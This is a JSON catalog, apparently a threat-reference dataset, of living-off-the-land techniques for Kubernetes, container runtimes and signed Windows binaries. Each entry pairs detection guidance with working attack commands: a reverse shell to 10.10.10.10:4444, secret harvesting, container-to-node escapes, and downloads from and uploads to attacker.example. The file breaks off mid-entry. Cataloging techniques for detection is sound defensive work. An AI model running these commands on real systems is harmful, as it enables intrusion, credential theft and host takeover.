daemon-backlog.json (68720B)
1 [ 2 { 3 "toolName": "kubectl", 4 "toolId": "kubectl", 5 "platform": [ 6 "Linux", 7 "Windows" 8 ], 9 "capability": [ 10 "Execution", 11 "Reverse/Bind Shell" 12 ], 13 "nativeCategory": [ 14 "Execute", 15 "Container Administration" 16 ], 17 "command": "kubectl exec -it pod-x -n ns-x -- /bin/sh\nkubectl exec pod-x -n ns-x -- bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\"", 18 "description": "Runs an arbitrary command inside an already-running pod through the Kubernetes API's pods/exec subresource, giving an interactive shell without deploying anything new. With a token that has the exec verb, an operator can pivot into any reachable workload and, as shown, spawn a reverse shell back to a listener.", 19 "usecase": "Interactively run commands or pop a shell inside an existing pod using only exec RBAC, avoiding creation of new objects.", 20 "mitre": [ 21 "T1609" 22 ], 23 "privilege": "user", 24 "detection": "Kubernetes API audit log create events on the pods/exec subresource (objectRef.subresource=exec). Alert on exec into production/system namespaces, exec by service-account identities that normally never exec, and exec commands spawning shells (sh, bash, /dev/tcp). Correlate with kubelet logs.", 25 "references": [ 26 "https://attack.mitre.org/techniques/T1609/", 27 "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/" 28 ], 29 "verifyNote": "MITRE T1609 page explicitly names `kubectl exec` as a procedure; kubectl_exec generated docs confirm -it/-n/-- syntax. Binary absent from GTFOBins/LOLBAS/WADComs." 30 }, 31 { 32 "toolName": "kubectl", 33 "toolId": "kubectl", 34 "platform": [ 35 "Linux" 36 ], 37 "capability": [ 38 "Credential Access", 39 "Collection" 40 ], 41 "nativeCategory": [ 42 "Credential Access" 43 ], 44 "command": "kubectl get secrets --all-namespaces -o json\nkubectl get secret secret-x -n ns-x -o jsonpath='{.data.token}' | base64 -d", 45 "description": "Lists Kubernetes Secret objects and dumps their contents. Secret data is only base64-encoded in the API, so a single get/list on the secrets resource returns service-account tokens, registry pull creds, TLS keys and app passwords in recoverable form. --all-namespaces harvests every namespace the identity can read.", 46 "usecase": "Harvest tokens, cloud keys and passwords cluster-wide from the API when the compromised identity holds get/list on secrets.", 47 "mitre": [ 48 "T1552.007" 49 ], 50 "privilege": "user", 51 "detection": "Enable RequestResponse-level audit on the secrets resource. Alert on list/get across many namespaces or all-namespaces, especially from service accounts. Red Canary Atomic T1552.007 mirrors this. Watch /api/v1/secrets and /api/v1/namespaces/*/secrets GET/LIST spikes.", 52 "references": [ 53 "https://attack.mitre.org/techniques/T1552/007/", 54 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md", 55 "https://kubernetes.io/docs/concepts/configuration/secret/" 56 ], 57 "verifyNote": "MITRE T1552.007 (Container API) description explicitly covers using the Kubernetes API to retrieve Secrets; Red Canary Atomic T1552.007 replicates `kubectl get secrets`. Secrets are base64, not encrypted (k8s Secret docs)." 58 }, 59 { 60 "toolName": "kubectl", 61 "toolId": "kubectl", 62 "platform": [ 63 "Linux" 64 ], 65 "capability": [ 66 "Privilege Escalation", 67 "Execution" 68 ], 69 "nativeCategory": [ 70 "Escape to Host", 71 "Deploy Container" 72 ], 73 "command": "kubectl run pod-x -n ns-x --restart=Never -it --rm --image=alpine --overrides='{\"spec\":{\"hostPID\":true,\"containers\":[{\"name\":\"c\",\"image\":\"alpine\",\"stdin\":true,\"tty\":true,\"command\":[\"/bin/sh\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"name\":\"host\",\"mountPath\":\"/host\"}]}],\"volumes\":[{\"name\":\"host\",\"hostPath\":{\"path\":\"/\"}}]}}'\n# then inside: chroot /host sh", 74 "description": "Uses the --overrides flag of kubectl run to inject a raw pod spec that is privileged, shares the host PID namespace and mounts the node root filesystem via a hostPath volume. Once scheduled, chroot /host yields a root shell on the underlying node, escaping the cluster's isolation boundary.", 75 "usecase": "Escape from cluster tenant to full node root when the identity can create pods with privileged/hostPath specs (no PodSecurity restricted).", 76 "mitre": [ 77 "T1611", 78 "T1610" 79 ], 80 "privilege": "user", 81 "detection": "Audit pods/create where securityContext.privileged=true, hostPID/hostNetwork/hostIPC=true, or volumes[].hostPath is set (especially path /). Enforce Pod Security Admission 'restricted' or an admission controller (OPA/Kyverno) to block these specs and alert on rejections.", 82 "references": [ 83 "https://attack.mitre.org/techniques/T1611/", 84 "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html" 85 ], 86 "verifyNote": "`--overrides` is a documented kubectl run flag (inline JSON merged into the generated object); kubernetes/kubectl#721 and HackTricks document it as the privileged/hostPath escape workaround. T1611 (Escape to Host)+T1610 (Deploy Container) correct." 87 }, 88 { 89 "toolName": "kubectl", 90 "toolId": "kubectl", 91 "platform": [ 92 "Linux" 93 ], 94 "capability": [ 95 "Privilege Escalation", 96 "File Read" 97 ], 98 "nativeCategory": [ 99 "Node Access", 100 "Escape to Host" 101 ], 102 "command": "kubectl debug node/node-x -it --image=alpine --profile=sysadmin\n# then inside the debug pod: chroot /host sh", 103 "description": "kubectl debug node creates a debugging pod that runs in the target node's host namespaces with the node root filesystem mounted at /host. Combined with --profile=sysadmin (privileged) and chroot /host it provides root-level access to the node's disk and processes, a supported feature repurposed for host takeover.", 104 "usecase": "Obtain node filesystem/root access through the sanctioned node-debug path when create-pods on nodes is permitted.", 105 "mitre": [ 106 "T1611" 107 ], 108 "privilege": "user", 109 "detection": "Audit for pod create with names matching node-debugger-* and node-scoped debug pods carrying host namespaces or --profile=sysadmin. Alert on debug pods mounting /host or running chroot. Restrict the node/debug capability via RBAC.", 110 "references": [ 111 "https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/", 112 "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/" 113 ], 114 "verifyNote": "kubernetes.io 'Debugging Kubernetes Nodes With Kubectl' page (fetched live) confirms node root mounts at /host, that plain debug is not privileged so chroot /host fails unless `--profile=sysadmin` is used; T1611. Both refs live." 115 }, 116 { 117 "toolName": "kubectl", 118 "toolId": "kubectl", 119 "platform": [ 120 "Linux", 121 "Windows" 122 ], 123 "capability": [ 124 "File Copy", 125 "Collection" 126 ], 127 "nativeCategory": [ 128 "File Copy", 129 "Collection" 130 ], 131 "command": "kubectl cp ns-x/pod-x:/etc/passwd /tmp/x\nkubectl cp /tmp/x ns-x/pod-x:/tmp/x", 132 "description": "Copies files and directories out of or into a pod. Under the hood kubectl cp streams a tar archive through the pods/exec subresource (the container image must contain tar), so it doubles as a data-exfiltration and tool-staging channel that only needs exec permission.", 133 "usecase": "Pull sensitive files out of a pod or stage attacker tooling into it using nothing but exec/cp rights.", 134 "mitre": [ 135 "T1609" 136 ], 137 "privilege": "user", 138 "detection": "cp rides pods/exec, so audit exec create events invoking tar (command contains 'tar -cf -' or 'tar -xmf -'). Alert on exec+tar into/out of sensitive workloads and on large streamed transfers correlated with exec sessions.", 139 "references": [ 140 "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/", 141 "https://attack.mitre.org/techniques/T1609/" 142 ], 143 "verifyNote": "kubectl_cp generated docs confirm cp streams a tar via the exec subresource and requires tar in the container image; T1609 justified because cp executes tar in-container. Absent from GTFOBins/LOLBAS." 144 }, 145 { 146 "toolName": "kubectl", 147 "toolId": "kubectl", 148 "platform": [ 149 "Linux" 150 ], 151 "capability": [ 152 "Discovery" 153 ], 154 "nativeCategory": [ 155 "Discovery" 156 ], 157 "command": "kubectl auth can-i --list\nkubectl auth can-i create pods -n ns-x\nkubectl auth can-i --list --as=system:serviceaccount:ns-x:sa-x", 158 "description": "Queries the RBAC authorizer (SelfSubjectRulesReview / SelfSubjectAccessReview) to enumerate exactly which resources and verbs the current identity is allowed. --list dumps the full permission matrix; --as combines with impersonation rights to map another subject's power without using its credentials.", 159 "usecase": "Enumerate the compromised token's RBAC reach (and plan escalation) before taking any noisy action.", 160 "mitre": [ 161 "T1069" 162 ], 163 "privilege": "user", 164 "detection": "Audit create events on selfsubjectrulesreviews / selfsubjectaccessreviews (a public Sigma rule flags RBAC permission listing). A burst of can-i / --list right after a new token appears is a strong recon signal; alert on impersonation (--as) combined with these reviews.", 165 "references": [ 166 "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", 167 "https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/" 168 ], 169 "verifyNote": "can-i --list uses SelfSubjectRulesReview (k8s authz docs, 'Checking API access'); detection.fyi Sigma rule 'RBAC Permission Enumeration Attempt' fetched live (it tags T1069.003/T1087.004 — parent T1069 retained as correct)." 170 }, 171 { 172 "toolName": "kubectl", 173 "toolId": "kubectl", 174 "platform": [ 175 "Linux" 176 ], 177 "capability": [ 178 "Lateral Movement" 179 ], 180 "nativeCategory": [ 181 "Lateral Movement", 182 "Proxy" 183 ], 184 "command": "kubectl port-forward svc/svc-x -n ns-x 8080:80\nkubectl port-forward --address 0.0.0.0 pod-x -n ns-x 8080:8080", 185 "description": "Opens a tunnel from the operator's machine, through the API server and kubelet, to a port on a pod or service via the pods/portforward subresource. This reaches ClusterIP-only services (databases, internal admin UIs, dashboards) that are otherwise unroutable, and --address 0.0.0.0 can expose the tunnel to other hosts.", 186 "usecase": "Reach cluster-internal services (DBs, dashboards, metadata proxies) from outside without deploying a pod.", 187 "mitre": [ 188 "T1090.001" 189 ], 190 "privilege": "user", 191 "detection": "Audit create on the pods/portforward subresource (objectRef.subresource=portforward). Alert on port-forward to sensitive services (etcd, databases, dashboards), long-lived forwards, and --address bindings other than localhost.", 192 "references": [ 193 "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward", 194 "https://attack.mitre.org/techniques/T1090/001/" 195 ], 196 "verifyNote": "Command real: `kubectl port-forward` with the pods/portforward subresource and the `--address` flag are documented in kubectl docs. FIX: MITRE changed T1609->T1090.001 (Internal Proxy) and reference swapped accordingly — T1609 is defined as executing commands within a container, which port-forward does not do; it establishes a proxy tunnel to internal services." 197 }, 198 { 199 "toolName": "kubectl", 200 "toolId": "kubectl", 201 "platform": [ 202 "Linux" 203 ], 204 "capability": [ 205 "Credential Access" 206 ], 207 "nativeCategory": [ 208 "Credential Access", 209 "Token Request" 210 ], 211 "command": "kubectl create token sa-x -n ns-x --duration=999999h", 212 "description": "Requests a bound service-account token through the TokenRequest API. An identity that can create serviceaccounts/token for a more-privileged service account can mint a fresh bearer token for it and assume its permissions, with --duration pushing the expiry far out.", 213 "usecase": "Mint a valid bearer token for a higher-privileged service account to escalate or persist.", 214 "mitre": [ 215 "T1528" 216 ], 217 "privilege": "user", 218 "detection": "Audit create on the serviceaccounts/token subresource (TokenRequest). Alert when a subject requests tokens for service accounts it does not own, on unusually long --duration / requested expirationSeconds, and on token requests for privileged SAs (e.g. cluster-admin-bound).", 219 "references": [ 220 "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/", 221 "https://attack.mitre.org/techniques/T1528/" 222 ], 223 "verifyNote": "kubectl_create_token generated docs confirm `create token` is backed by the TokenRequest API and that `--duration` sets the requested token lifetime; T1528 (Steal Application Access Token) fits assuming a higher-priv SA. Server may cap very long durations, but the flag is real." 224 }, 225 { 226 "toolName": "kubectl", 227 "toolId": "kubectl", 228 "platform": [ 229 "Linux", 230 "Windows" 231 ], 232 "capability": [ 233 "Discovery" 234 ], 235 "nativeCategory": [ 236 "Discovery" 237 ], 238 "command": "kubectl get pods -A -o wide\nkubectl get nodes -o wide\nkubectl get all -A -o yaml", 239 "description": "Enumerates cluster resources: pods and their node placement/IPs, nodes and addresses, and full object manifests. -o yaml exposes environment variables, mounted volumes, image references and annotations that frequently leak credentials and reveal the escape/lateral-movement surface.", 240 "usecase": "Map workloads, nodes and embedded config/secrets to plan lateral movement and host escape.", 241 "mitre": [ 242 "T1613" 243 ], 244 "privilege": "user", 245 "detection": "Audit high-volume list/get across pods, nodes and other resources (especially -A / cluster-scoped) from a single identity in a short window. Baseline normal read patterns per service account and alert on broad enumeration by identities that usually touch one namespace.", 246 "references": [ 247 "https://attack.mitre.org/techniques/T1613/", 248 "https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/" 249 ], 250 "verifyNote": "kubectl_get generated docs confirm -A/--all-namespaces, -o wide and -o yaml; T1613 (Container and Resource Discovery) is the correct technique for cluster resource enumeration." 251 }, 252 { 253 "toolName": "crictl", 254 "toolId": "crictl", 255 "platform": [ 256 "Linux" 257 ], 258 "capability": [ 259 "Execution" 260 ], 261 "nativeCategory": [ 262 "Execute", 263 "Container Administration" 264 ], 265 "command": "crictl ps\ncrictl exec -it CONTAINERID sh", 266 "description": "crictl is the CRI debugging CLI that talks directly to the node's container runtime (containerd/CRI-O) socket, bypassing the API server and kubelet policy entirely. From a compromised node, crictl ps lists running containers and crictl exec drops an interactive shell into any of them, including other tenants' workloads.", 267 "usecase": "On a node, execute into any running container out-of-band of the Kubernetes API and its RBAC/audit.", 268 "mitre": [ 269 "T1609" 270 ], 271 "privilege": "admin", 272 "detection": "Node-level process/auditd monitoring: exec of crictl (and containerd-shim/runc exec children) not originating from kubelet. These actions bypass API audit, so rely on host EDR and file/socket access to /run/containerd/containerd.sock or /var/run/crio/crio.sock.", 273 "references": [ 274 "https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/", 275 "https://attack.mitre.org/techniques/T1609/" 276 ], 277 "verifyNote": "kubernetes.io crictl debug docs and cri-tools confirm `crictl ps` and `crictl exec -it`; crictl speaks directly to the CRI socket, bypassing apiserver/RBAC/audit. Not a GTFOBins/LOLBAS binary; T1609." 278 }, 279 { 280 "toolName": "crictl", 281 "toolId": "crictl", 282 "platform": [ 283 "Linux" 284 ], 285 "capability": [ 286 "Credential Access", 287 "Discovery" 288 ], 289 "nativeCategory": [ 290 "Credential Access", 291 "Discovery" 292 ], 293 "command": "crictl ps -a\ncrictl inspect CONTAINERID", 294 "description": "crictl inspect returns a container's full CRI status JSON including its environment variables, command line, mounts and labels. Applications commonly pass secrets (DB passwords, API keys, tokens) as env vars, so inspecting containers on a node reveals those plaintext values without touching Kubernetes Secret objects or the API server.", 295 "usecase": "Read plaintext env-var secrets and mount layout of colocated containers straight from the node runtime.", 296 "mitre": [ 297 "T1552.007", 298 "T1613" 299 ], 300 "privilege": "admin", 301 "detection": "Auditd/EDR for crictl inspect / inspectp / inspecti invocations on nodes outside of sanctioned tooling, and for reads of the containerd/CRI-O socket. Prefer mounting secrets as files with restrictive modes over env vars to shrink this exposure.", 302 "references": [ 303 "https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/", 304 "https://attack.mitre.org/techniques/T1552/007/" 305 ], 306 "verifyNote": "cri-tools/crictl docs confirm `crictl inspect` returns container status JSON incl. env vars (and inspectp/inspecti variants exist); reading runtime-held env secrets fits T1552.007 (Container API) + T1613 discovery." 307 }, 308 { 309 "toolName": "ctr", 310 "toolId": "ctr", 311 "platform": [ 312 "Linux" 313 ], 314 "capability": [ 315 "Privilege Escalation", 316 "Execution" 317 ], 318 "nativeCategory": [ 319 "Escape to Host", 320 "Bind Mount Escape" 321 ], 322 "command": "ctr image pull {REMOTEURL}/ubuntu:latest\nctr run --privileged --net-host -t {REMOTEURL}/ubuntu:latest esc bash\nctr run --mount type=bind,src=/,dst=/host,options=rbind:rw -t {REMOTEURL}/ubuntu:latest esc chroot /host bash", 323 "description": "ctr is containerd's low-level admin client. With access to the containerd socket an operator can pull an image and launch a container with --privileged/--net-host, or bind-mount the node root (src=/) into the container; chroot /host then yields a root shell on the node. It bypasses the kube-apiserver and any admission control.", 324 "usecase": "Turn containerd socket access on a node into node root via a privileged or host-bind-mount container.", 325 "mitre": [ 326 "T1611" 327 ], 328 "privilege": "admin", 329 "detection": "Auditd/EDR for ctr invocations carrying --privileged, --net-host, or --mount type=bind,src=/ , and for access to /run/containerd/containerd.sock by non-kubelet processes. New containerd tasks from unexpected images/registries on a node are high-signal.", 330 "references": [ 331 "https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html", 332 "https://attack.mitre.org/techniques/T1611/" 333 ], 334 "verifyNote": "HackTricks containerd-ctr page confirms the exact `ctr run --privileged --net-host` and `ctr run --mount type=bind,src=/,dst=/...` host-mount escapes; ctr is not a GTFOBins binary; T1611. (options=rbind:rw is a benign superset of the documented options=rbind.)" 335 }, 336 { 337 "toolName": "runc", 338 "toolId": "runc", 339 "platform": [ 340 "Linux" 341 ], 342 "capability": [ 343 "Privilege Escalation" 344 ], 345 "nativeCategory": [ 346 "Escape to Host", 347 "Bind Mount Escape" 348 ], 349 "command": "runc spec\n# edit config.json mounts: {\"type\":\"bind\",\"source\":\"/\",\"destination\":\"/\",\"options\":[\"rbind\",\"rw\",\"rprivate\"]}\nmkdir rootfs\nrunc run esc", 350 "description": "runc is the OCI runtime under Docker/containerd/CRI-O. Where runc is available with root, an operator can generate an OCI bundle with runc spec, edit config.json to bind-mount the host root (source \"/\") into the container, and runc run it, producing a container whose filesystem is the node's, granting full host access outside any orchestration policy.", 351 "usecase": "Spawn an OCI container that bind-mounts the host root to reach node root when runc is runnable as root.", 352 "mitre": [ 353 "T1611" 354 ], 355 "privilege": "admin", 356 "detection": "Auditd/EDR for runc spec and runc run invocations that are not children of containerd-shim/dockerd (i.e. manual bundles), and for config.json files whose mounts bind source \"/\". Flag new OCI bundle directories written to disk followed by runc run.", 357 "references": [ 358 "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation", 359 "https://attack.mitre.org/techniques/T1611/" 360 ], 361 "verifyNote": "HackTricks runc page confirms `runc spec` -> edit config.json to bind-mount source '/' -> `runc run`; also confirms runc must run as root (privilege=admin). T1611; runc is not a GTFOBins binary." 362 }, 363 { 364 "toolName": "docker", 365 "toolId": "docker", 366 "platform": [ 367 "Linux" 368 ], 369 "capability": [ 370 "Collection", 371 "File Read" 372 ], 373 "nativeCategory": [ 374 "Collection", 375 "Data Staging" 376 ], 377 "command": "docker cp CONTAINERID:/etc/shadow /tmp/x\ndocker export CONTAINERID -o /tmp/x.tar\ndocker save IMAGE:latest -o /tmp/x.tar", 378 "description": "With Docker daemon access, docker cp pulls individual files out of any container's filesystem, docker export writes a tar snapshot of a container's whole filesystem, and docker save archives full images (all layers/history). Together they let an operator harvest other containers' files, embedded secrets and build-time credentials from a single node.", 379 "usecase": "Collect files, filesystem snapshots and image layers (with baked-in secrets) from colocated containers.", 380 "mitre": [ 381 "T1005" 382 ], 383 "privilege": "admin", 384 "detection": "docker events for export/save/cp actions and auditd for large tar writes by dockerd; flag export/save of containers or images the user did not create, and cp reads of sensitive paths (/etc/shadow, mounted secret volumes). Baseline legitimate backup jobs to reduce noise.", 385 "references": [ 386 "https://docs.docker.com/reference/cli/docker/container/export/", 387 "https://docs.docker.com/reference/cli/docker/image/save/", 388 "https://attack.mitre.org/techniques/T1005/" 389 ], 390 "verifyNote": "docker export/save/cp CLI docs confirm the commands and -o/--output (export page fetched live). Criterion (e) caveat: `docker cp` overlaps the existing GTFOBins docker File-read/File-write functions, but `docker export`/`docker save` (whole-filesystem and whole-image tar for bulk collection, T1005) are additive and absent from GTFOBins — kept for that additive value." 391 }, 392 { 393 "toolName": "nerdctl", 394 "toolId": "nerdctl", 395 "platform": [ 396 "Linux" 397 ], 398 "capability": [ 399 "Privilege Escalation", 400 "Execution" 401 ], 402 "nativeCategory": [ 403 "Escape to Host", 404 "Bind Mount Escape" 405 ], 406 "command": "nerdctl run --privileged --rm -it -v /:/host alpine chroot /host sh", 407 "description": "nerdctl is the Docker-compatible CLI for containerd and accepts docker run flags. On a node with containerd, an operator can run a --privileged container that bind-mounts the host root (-v /:/host) and chroot /host to obtain node root, the same host-mount escape as docker/ctr but through the nerdctl front-end.", 408 "usecase": "Escape to node root via containerd using familiar docker-style --privileged and host-mount flags.", 409 "mitre": [ 410 "T1611" 411 ], 412 "privilege": "admin", 413 "detection": "Auditd/EDR for nerdctl invocations with --privileged or -v /:/ (host-root bind) and for new containerd tasks not launched by kubelet. Restrict access to the containerd socket and to the nerdctl binary; alert on chroot into a host-root mount inside a container.", 414 "references": [ 415 "https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md", 416 "https://attack.mitre.org/techniques/T1611/" 417 ], 418 "verifyNote": "nerdctl command-reference confirms Docker-compatible `--privileged` and `-v` bind mounts; same host-mount escape as docker but nerdctl is NOT a GTFOBins/LOLBAS binary, so the entry is additive; T1611." 419 }, 420 { 421 "toolName": "msiexec.exe", 422 "toolId": "msiexec", 423 "platform": [ 424 "Windows" 425 ], 426 "capability": [ 427 "Execution", 428 "AWL / Policy Bypass" 429 ], 430 "nativeCategory": [ 431 "Execute" 432 ], 433 "command": "msiexec /q /i https://attacker.example/x.msi", 434 "description": "The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\\Windows\\Temp\\x.msi TRANSFORMS=\"https://attacker.example/x.mst\" /qb.", 435 "usecase": "Proxy execution of attacker code through a trusted, signed installer, including from a remote URL.", 436 "mitre": [ 437 "T1218.007", 438 "T1105" 439 ], 440 "privilege": "user", 441 "detection": "msiexec.exe with an http(s):// argument or a network-facing parent; msiexec.exe spawning cmd.exe/powershell.exe/rundll32; MSI or MST files written into INetCache; TRANSFORMS= pointing at a URL.", 442 "references": [ 443 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml", 444 "https://attack.mitre.org/techniques/T1218/007/" 445 ], 446 "verifyNote": "LOLBAS Msiexec.yml quotes both `msiexec /q /i {REMOTEURL}` and `msiexec /i {PATH} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb`, MitreID T1218.007; verbatim match." 447 }, 448 { 449 "toolName": "curl.exe", 450 "toolId": "curl", 451 "platform": [ 452 "Windows", 453 "Linux", 454 "macOS" 455 ], 456 "capability": [ 457 "File Download", 458 "File Upload" 459 ], 460 "nativeCategory": [ 461 "Download", 462 "Upload" 463 ], 464 "command": "curl.exe -o C:\\Windows\\Temp\\x.exe http://attacker.example/x.exe\ncurl.exe -T C:\\Windows\\Temp\\loot.zip http://attacker.example/upload/", 465 "description": "curl.exe has shipped in-box on Windows 10 since build 1803 (and on macOS/Linux for years). -o/--output writes a downloaded URL to a chosen path (ingress transfer) and -T/--upload-file (or -d/--data for POST) exfiltrates a local file to a remote server, all from a Microsoft-signed binary.", 466 "usecase": "Download a payload or stage/exfiltrate data using a built-in, trusted HTTP client instead of certutil/bitsadmin.", 467 "mitre": [ 468 "T1105", 469 "T1567" 470 ], 471 "privilege": "user", 472 "detection": "curl.exe writing executable/script content with -o/-O; curl.exe -T/--upload-file or -d to external hosts; curl.exe with a non-interactive parent (office, script host); egress to newly-seen domains from curl.exe.", 473 "references": [ 474 "https://curl.se/docs/manpage.html", 475 "https://curl.se/windows/" 476 ], 477 "verifyNote": "curl.se manpage documents -o/--output and -T/--upload-file (and -d/--data) exactly as described; curl.se/windows confirms the Microsoft-signed in-box build." 478 }, 479 { 480 "toolName": "tar.exe", 481 "toolId": "tar", 482 "platform": [ 483 "Windows" 484 ], 485 "capability": [ 486 "File Download", 487 "Defense Evasion" 488 ], 489 "nativeCategory": [ 490 "Download", 491 "Hide/ADS" 492 ], 493 "command": "tar.exe -xf \\\\10.10.10.10\\share\\x.tar -C C:\\Windows\\Temp\ntar.exe -cf C:\\Windows\\Temp\\x.txt:evil.tar C:\\Windows\\Temp\\payload", 494 "description": "The in-box bsdtar (Windows 10 1803+) extracts an archive directly from a UNC/SMB path, pulling files from a remote host without a classic downloader (ingress transfer). tar can also read from and write to NTFS Alternate Data Streams (path:ads), hiding archived payloads inside a benign-looking file.", 495 "usecase": "Copy files in from a remote share, or stash a payload in an ADS to evade file-based detection, using a signed archiver.", 496 "mitre": [ 497 "T1105", 498 "T1564.004" 499 ], 500 "privilege": "user", 501 "detection": "tar.exe with a UNC (\\\\host\\share) source; tar.exe archive paths containing ':' (ADS notation); tar.exe making SMB/network connections; extraction into system-writable temp dirs.", 502 "references": [ 503 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml", 504 "https://learn.microsoft.com/en-us/windows/tar/" 505 ], 506 "verifyNote": "LOLBAS Tar.yml documents `tar -xf {PATH_SMB:.tar}` (T1105) and `tar -cf {PATH}:ads {folder}` / `tar -xf {PATH}:ads` (T1564.004); both match." 507 }, 508 { 509 "toolName": "ssh.exe", 510 "toolId": "ssh", 511 "platform": [ 512 "Windows", 513 "Linux", 514 "macOS" 515 ], 516 "capability": [ 517 "Execution", 518 "Library Load" 519 ], 520 "nativeCategory": [ 521 "Execute" 522 ], 523 "command": "ssh.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" .\nssh.exe -o PKCS11Provider=\"\\\\10.10.10.10\\Temp\\x.dll\" user@test.local", 524 "description": "The in-box OpenSSH client (Windows 10 1809+) runs the string given in ProxyCommand/LocalCommand through the shell before it ever connects, giving indirect command execution under a signed binary. The PKCS11Provider option loads and executes an attacker DLL (DllMain / C_GetFunctionList) from a remote SMB share.", 525 "usecase": "Proxy-execute a command or side-load a DLL from a signed, trusted SSH client for defense evasion.", 526 "mitre": [ 527 "T1202", 528 "T1218" 529 ], 530 "privilege": "user", 531 "detection": "ssh.exe with ProxyCommand/LocalCommand/PKCS11Provider on the command line; ssh.exe spawning cmd.exe/powershell.exe; ssh.exe loading a non-standard DLL from a UNC path; ssh.exe run with no legitimate remote host.", 532 "references": [ 533 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml", 534 "https://attack.mitre.org/techniques/T1202/" 535 ], 536 "verifyNote": "LOLBAS Ssh.yml quotes `ssh -o ProxyCommand=\"{CMD}\" .` and `ssh -o PKCS11Provider=\"\\\\...\\example.dll\"` (DLL from SMB share), MitreID T1202; match. NOTE: secondary T1218 tag flagged in suspect — the PKCS11 DLL load maps better to T1574.002/T1129." 537 }, 538 { 539 "toolName": "scp.exe", 540 "toolId": "scp", 541 "platform": [ 542 "Windows", 543 "Linux", 544 "macOS" 545 ], 546 "capability": [ 547 "Execution", 548 "File Copy" 549 ], 550 "nativeCategory": [ 551 "Execute" 552 ], 553 "command": "scp.exe -S C:\\Windows\\Temp\\x.exe . localhost:.\nscp.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" . localhost:.", 554 "description": "The in-box OpenSSH scp client spawns the program named by -S (alternate ssh program) or ProxyCommand even when no SSH server is listening, giving indirect command execution under a signed binary. scp also legitimately copies files to/from remote hosts and can be used to stage or exfiltrate data.", 555 "usecase": "Proxy-execute a command through scp->ssh, or move files off-host, using a signed binary.", 556 "mitre": [ 557 "T1202", 558 "T1105" 559 ], 560 "privilege": "user", 561 "detection": "scp.exe with -S or -o ProxyCommand; scp.exe child processes (cmd/powershell); scp.exe copying to/from external hosts; scp targeting localhost with no SSH service present.", 562 "references": [ 563 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml", 564 "https://attack.mitre.org/techniques/T1202/" 565 ], 566 "verifyNote": "LOLBAS Scp.yml quotes both `scp.exe -S \"{CMD}\" . localhost:.` and `scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.` (spawns even with no SSH), MitreID T1202; match." 567 }, 568 { 569 "toolName": "msedge.exe", 570 "toolId": "msedge", 571 "platform": [ 572 "Windows", 573 "macOS", 574 "Linux" 575 ], 576 "capability": [ 577 "File Download", 578 "Execution" 579 ], 580 "nativeCategory": [ 581 "Download", 582 "Execute" 583 ], 584 "command": "msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"https://attacker.example/x.base64.html\" > C:\\Windows\\Temp\\x.b64\nmsedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"", 585 "description": "Chromium browsers (Edge is preinstalled and signed; chrome.exe behaves identically) print the rendered DOM to stdout with --headless --dump-dom, letting an operator pull a base64 payload disguised as an .html page with no classic downloader on the command line. The --gpu-launcher switch runs an arbitrary command as a child of the signed browser (system binary proxy execution).", 586 "usecase": "Silently download a payload via a trusted browser, or proxy-execute a command under a signed browser process.", 587 "mitre": [ 588 "T1105", 589 "T1218" 590 ], 591 "privilege": "user", 592 "detection": "browser process (msedge.exe/chrome.exe) with --headless together with --dump-dom, or with --gpu-launcher/--utility-cmd-prefix/--renderer-cmd-prefix; browser redirecting stdout to a file; browser process whose parent is a script host or Office app.", 593 "references": [ 594 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml", 595 "https://twitter.com/mrd0x/status/1478234484881436672" 596 ], 597 "verifyNote": "LOLBAS Msedge.yml (OSBinaries) documents `--headless --enable-logging --disable-gpu --dump-dom` (T1105) and `--disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` (T1218.015); reference URL corrected to the OSBinaries YAML path." 598 }, 599 { 600 "toolName": "MpCmdRun.exe", 601 "toolId": "mpcmdrun", 602 "platform": [ 603 "Windows" 604 ], 605 "capability": [ 606 "File Download", 607 "Defense Evasion" 608 ], 609 "nativeCategory": [ 610 "Download", 611 "ADS" 612 ], 613 "command": "MpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe\nMpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe:evil.exe", 614 "description": "Microsoft Defender's command-line utility (MpCmdRun.exe) downloads an arbitrary URL to disk with -DownloadFile (slashes or dashes both work), and can drop the file straight into an NTFS Alternate Data Stream. It is a signed AV binary, so the transfer blends in. Microsoft removed the flag in newer builds, but older platform copies remain abusable.", 615 "usecase": "Download a payload (optionally hidden in an 